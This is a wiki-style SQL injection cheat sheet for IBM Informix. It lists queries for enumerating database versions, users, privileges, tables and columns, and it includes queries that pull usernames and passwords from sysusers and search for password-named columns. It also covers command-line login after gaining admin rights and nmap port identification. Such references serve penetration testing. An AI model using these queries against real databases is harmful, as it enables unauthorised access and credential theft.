====== Hacking - SQL Injection Cheat Sheet (Informix) ====== |Version| SELECT DBINFO('version', 'full') FROM systables WHERE tabid = 1; SELECT DBINFO('version', 'server-type') FROM systables WHERE tabid = 1; SELECT DBINFO('version', 'major'), DBINFO('version', 'minor'), DBINFO('version', 'level') FROM systables WHERE tabid = 1; SELECT DBINFO('version', 'os') FROM systables WHERE tabid = 1; -- T=Windows, U=32 bit app on 32-bit Unix, H=32-bit app running on 64-bit Unix, F=64-bit app running on 64-bit unix | |Comments|select 1 FROM systables WHERE tabid = 1; -- comment| |Current User| SELECT USER FROM systables WHERE tabid = 1; select CURRENT_ROLE FROM systables WHERE tabid = 1; | |List Users|select username, usertype, password from sysusers;| |List Password Hashes|TODO| |List Privileges| select tabname, grantor, grantee, tabauth FROM systabauth join systables on systables.tabid = systabauth.tabid; -- which tables are accessible by which users select procname, owner, grantor, grantee from sysprocauth join sysprocedures on sysprocauth.procid = sysprocedures.procid; -- which procedures are accessible by which users | |List DBA Accounts|TODO| |Current Database|SELECT DBSERVERNAME FROM systables where tabid = 1; -- server name| |List Databases|select name, owner from sysdatabases;| |List Columns|select tabname, colname, owner, coltype FROM syscolumns join systables on syscolumns.tabid = systables.tabid;| |List Tables|select tabname, owner FROM systables;| |select tabname, viewtext FROM sysviews join systables on systables.tabid = sysviews.tabid;| |List Stored Procedures|select procname, owner FROM sysprocedures;| |Find Tables From Column Name|select tabname, colname, owner, coltype FROM syscolumns join systables on syscolumns.tabid = systables.tabid where colname like '%pass%';| |Select Nth Row|select first 1 tabid from (select first 10 tabid from systables order by tabid) as sq order by tabid desc; -- selects the 10th row| |Select Nth Char|SELECT SUBSTRING('ABCD' FROM 3 FOR 1) FROM systables where tabid = 1; -- returns 'C'| |Bitwise AND| select bitand(6, 1) from systables where tabid = 1; -- returns 0 select bitand(6, 2) from systables where tabid = 1; -- returns 2 | |ASCII Value -> Char|TODO| |Char -> ASCII Value|select ascii('A') from systables where tabid = 1;| |Casting| select cast('123' as integer) from systables where tabid = 1; select cast(1 as char) from systables where tabid = 1; | |String Concatenation| SELECT 'A' || 'B' FROM systables where tabid = 1; -- returns 'AB' SELECT concat('A', 'B') FROM systables where tabid = 1; -- returns 'AB' | |String Length|SELECT tabname, length(tabname), char_length(tabname), octet_length(tabname) from systables;| |If Statement|TODO| |Case Statement|select tabid, case when tabid>10 then "High" else 'Low' end from systables;| |Avoiding Quotes|TODO| |Time Delay|TODO| |Make DNS Requests|TODO| |Command Execution|TODO| |Local File Access|TODO| |Hostname, IP Address|SELECT DBINFO('dbhostname') FROM systables WHERE tabid = 1; -- hostname| |Location of DB files|TODO| |Default/System Databases| These are the system databases: sysmaster sysadmin* sysuser* sysutils* * = don't seem to contain anything / don't allow reading | |Installing Locally|You can download [[https://www.ibm.com/developerworks/downloads/im/dsexp/?S_TACT=105AGX11&S_CMP=LP|Informix Dynamic Server Express Edition 11.5 Trial]] for Linux and Windows.| |Database Client| There's a [[https://www14.software.ibm.com/webapp/download/search.jsp?rs=ifxdl|database client SDK]] available, which might be of use. I couldn't get the demo client working. I used [[http://squirrel-sql.sourceforge.net/|SQuirreL SQL Client Version 2.6.8]] after installing the [[https://www14.software.ibm.com/webapp/download/search.jsp?go=y&rs=ifxjdbc|Informix JDBC drivers]] ("emerge dev-java/jdbc-informix" on Gentoo). | |Logging in from command line| If you get local admin rights on a Windows box and have a GUI logon: - Click: Start | All Programs | IBM Informix Dynamic Server 11.50 | someservername. This will give you a command prompt with various Environment variables set properly. - Run dbaccess.exe from your command prompt. This will bring up a text-based GUI that allows you to browse databases. The following were set on my test system. This may help if you get command line access, but can't get a GUI - you'll need to change "testservername": set INFORMIXDIR=C:\PROGRA~1\IBM\IBMINF~1\11.50 set INFORMIXSERVER=testservername set ONCONFIG=ONCONFIG.testservername set PATH=C:\PROGRA~1\IBM\IBMINF~1\11.50\bin;C:\WINDOWS\system32;C:\WINDOWS; C:\WINDOWS\System32\Wbem;C:\PROGRA~1\ibm\gsk7\bin;C:\PROGRA~1\ibm\gsk7\lib; C:\Program Files\IBM\Informix\Clien-SDK\bin;C:\Program Files\ibm\gsk7\bin; C:\Program Files\ibm\gsk7\lib set CLASSPATH=C:\PROGRA~1\IBM\IBMINF~1\11.50\extend\krakatoa\krakatoa.jar; C:\PROGRA~1\IBM\IBMINF~1\11.50\xtend\krakatoa\jdbc.jar; set DBTEMP=C:\PROGRA~1\IBM\IBMINF~1\11.50\infxtmp set CLIENT_LOCALE=EN_US.CP1252 set DB_LOCALE=EN_US.8859-1 set SERVER_LOCALE=EN_US.CP1252 set DBLANG=EN_US.CP1252 mode con codepage select=1252 | |Identifying on the network| My default installation listened on two TCP ports: 9088 and 9099. When I created a new "server name", this listened on 1526/TCP by default. Nmap 4.76 didn't identify these ports as Informix: $ sudo nmap -sS -sV 10.0.0.1 -p- -v --version-all ... 1526/tcp open pdap-np? 9088/tcp open unknown 9089/tcp open unknown ... TODO How would we identify Informix listening on the network? | ---- ===== References ===== https://www.michaelboman.org/books/sql-injection-cheat-sheet-informix